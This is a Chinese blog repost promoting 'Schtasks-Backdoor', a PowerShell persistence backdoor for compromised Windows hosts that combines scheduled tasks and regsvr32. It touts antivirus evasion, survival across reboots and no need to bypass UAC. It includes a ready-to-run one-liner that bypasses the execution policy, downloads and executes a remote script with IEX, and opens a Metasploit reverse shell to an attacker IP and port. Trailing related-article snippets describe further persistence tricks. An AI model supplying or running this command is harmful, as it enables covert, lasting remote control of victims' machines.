后渗透篇:Schtasks-Backdoor(Powershell 权限维持后门)

最新推荐文章于 2024-06-20 15:15:00 发布
最新推荐文章于 2024-06-20 15:15:00 发布
阅读量998 收藏
点赞数
原文链接:https://blog.csdn.net/God_XiangYu/article/details/100035239
版权

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

 

Schtasks-Backdoor

关于

一款权限维持后门PowerShell脚本

原理

schtasks+regsvr32

功能

内网维持权限方法的一种。免杀效果好,重启生效。支持msf反弹,nc反弹,客户端不会用明显异常,自定义执行命令会有弹框(可以自己修改,思路可以使用mshta),一般实战中用nc或者msf。

用法

powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://8.8.8.8/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor -method msf -ip 8.8.8.8 -port 8081 -time 2"

此脚本优势就是不需要过uac权限。

Example(例子)

 

我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重

 

bylfsj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows常见的几种权限维持
hackzkaq的博客
05-24 1672
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
权限维持——powershell配置文件后门
mingyqf的博客
02-18 772
0x05 powershell配置文件后门 Powershell配置文件其实就是一个powershell脚本,他可以在每次运行powershell的时候自动运行,所以可以通过向该文件写入自定义的语句用来长期维持权限。 依次输入以下命令,查看当前是否存在配置文件。 echo $profile Test-path $profile 如果返回false则需要创建一个 New-Item -Path $profile -Type File –Force 然后写入命令,这里我以创建一个用户为目标,也可以写成反弹s
PBG:一款功能强大的PowerShell后门生成工具
最新发布
2401_84466359的博客
06-20 1093
1、Hak5 USB Rubber Ducky Payload生成;2、Flipper Zero Payload生成;3、从远程系统下载文件;4、从URL播放wav文件;5、获取目标计算机的公共IP地址;6、枚举本地用户;7、查看有价值的文件;8、收集有关目标系统操作系统的信息;9、从目标系统检索BIOS信息;10、检查是否安装了防病毒软件及其当前状态;11、获取活动TCP客户端;
权限维持 -- 隐藏用户建立(Powershell
diansuimo2268的博客
03-22 280
https://evi1cg.me/archives/UserClone.html 转载于:https://www.cnblogs.com/7bit/p/10577599.html
PowerShell配置文件后门
shiyingai
12-18 1157
  PowerShell 配置文件是在 PowerShell 启动时运行的脚本。   在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。 案例 echo $profile Test-path $profile # 结果返回false,表示没有该文件 New-Item –Path $Profile –Type File –Force # 强制创建一个 $string = 'S
PowerShell 配置文件后门
jijisaq的博客
05-18 1189
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!),现在星球有近150+位师傅相信并选择加入我们,圈子每天都会更新内容,老用户可永久享受初始加入价格,圈子内容持续更新中。变量的值发生更改,因此请确保在所使用的每个 PowerShell 主机应用程序中显示配置文件变量的值。自动变量存储当前会话中可用的 PowerShell 配置文件的路径。变量存储“当前用户,当前主机”配置文件的路径。
Window权限维持(二):计划任务1
08-03
### Window权限维持(二):计划任务1 #### 一、计划任务概述 Windows系统提供了强大的计划任务功能,可以通过schtasks.exe这个内置工具来安排程序或者脚本在指定的时间运行。这一特性不仅可以用于日常的系统维护...
第66天:内网安全-域横向批量at&schtasks&impacket1
08-03
1. 建立 IPC 链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4.
内网安全攻防-渗透测试指南 读书笔记.pdf
09-09
在进行内网渗透测试之前,理解Powershell执行策略及其如何影响脚本运行至关重要。 - **Powershell执行策略**:Powershell的安全执行策略通过控制脚本的执行来增强系统的安全性。共有四种不同的策略: - **...
ISC-内网渗透 -最终版.pdf
04-08
- **权限维持**:确保长期存在于目标网络中。 - **信息探测**:持续监控和搜集目标网络中的敏感信息。 ### 七、结论 通过对Active Directory渗透的基础知识、认证方式、远程命令执行技术及内网渗透流程的详细介绍...
taskcheduleR:使用Windows任务计划程序计划R脚本过程
02-05
它主要通过`schtasks`命令行工具与Windows任务计划程序进行交互,创建、修改或删除预定的任务。这使得R用户能够用他们熟悉的编程语言来管理复杂的定时任务,而无需深入学习新的系统工具。 安装`taskcheduleR`库非常...
批处理获取管理员代码
05-07
由于Windows权限问题许多时候需要获取管理员权限后才能执行,本资源使用在注册ocx控件时
APT35 启用了新 PowerShell 后门
老司机的后备箱
07-27 159
近日,研究人员发现 Phosphorus(又名 CharmingKitten、APT35)组织的攻击行动有所增长。业界多次发现该组织对各行各业机构或人士发起攻击,甚至干预美国总统选举。Cybereason 的研究人员最近发现 APT35 使用了名为PowerLess的新型 PowerShell 后门。该后门通过在 .NET上下文中直接运行而非生成 PowerShell 进程来规避 PowerShell 安全检测。在攻击行动中使用的新工具集并不止新的 PowerShell
Windows权限维持之建立影子账号、powershell配置文件后门、Monitor权限维持
Longwaer
01-10 1766
通过学习掌握Windows权限维持小技巧,更好的运行相关知识点来进行权限维持,更快知晓权限维持的作用。
渗透测试入门7之权限维持
鹿鸣天涯
04-03 1280
渗透测试入门7之权限维持 系统后门 Windows 1、密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 一个 Gina 木马主要用来截取 Windows 2000下的密码,WinlogonHack 主要用于截 取 Windows XP 以及 Windows 2003 Server。 键盘记录器...
msf生成webshell_用metasploit来生成Powershell后门
weixin_39959615的博客
12-22 1315
在Kali的shell中配置一个Powershell后门,针对Windows的Powershell所设计。root@kali:~# msfconsolemsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_de...
Windows权限维持方法
weixin_43722879的博客
08-15 476
Windows权限维持方法
网络安全实战之植入后门程序
kali_Ma的博客
12-21 2152
在VMware上建立两个虚拟机:win7和kali。Kali:它是Linux发行版的操作系统,它拥有超过300个渗透测试工具,就不用自己再去找安装包,去安装到我们自己的电脑上了,毕竟自己从网上找到,也不安全。它甚至还集成了600多种黑客工具,很强大。可以永久免费使用,基本上学黑客攻击必会用到这个系统。用ipconfig进行查询。用ifconfig进行查询。①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包。
Windows命令行创建计划任务教程:Schtasks命令详解
在Windows操作系统中,命令行工具"Schtasks"是管理计划任务的重要组件,它允许用户创建、编辑和删除定期运行的任务。如果你是从Unix/Linux背景转到Windows平台,可能会对这种基于命令行的计划任务管理感到陌生。本文...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值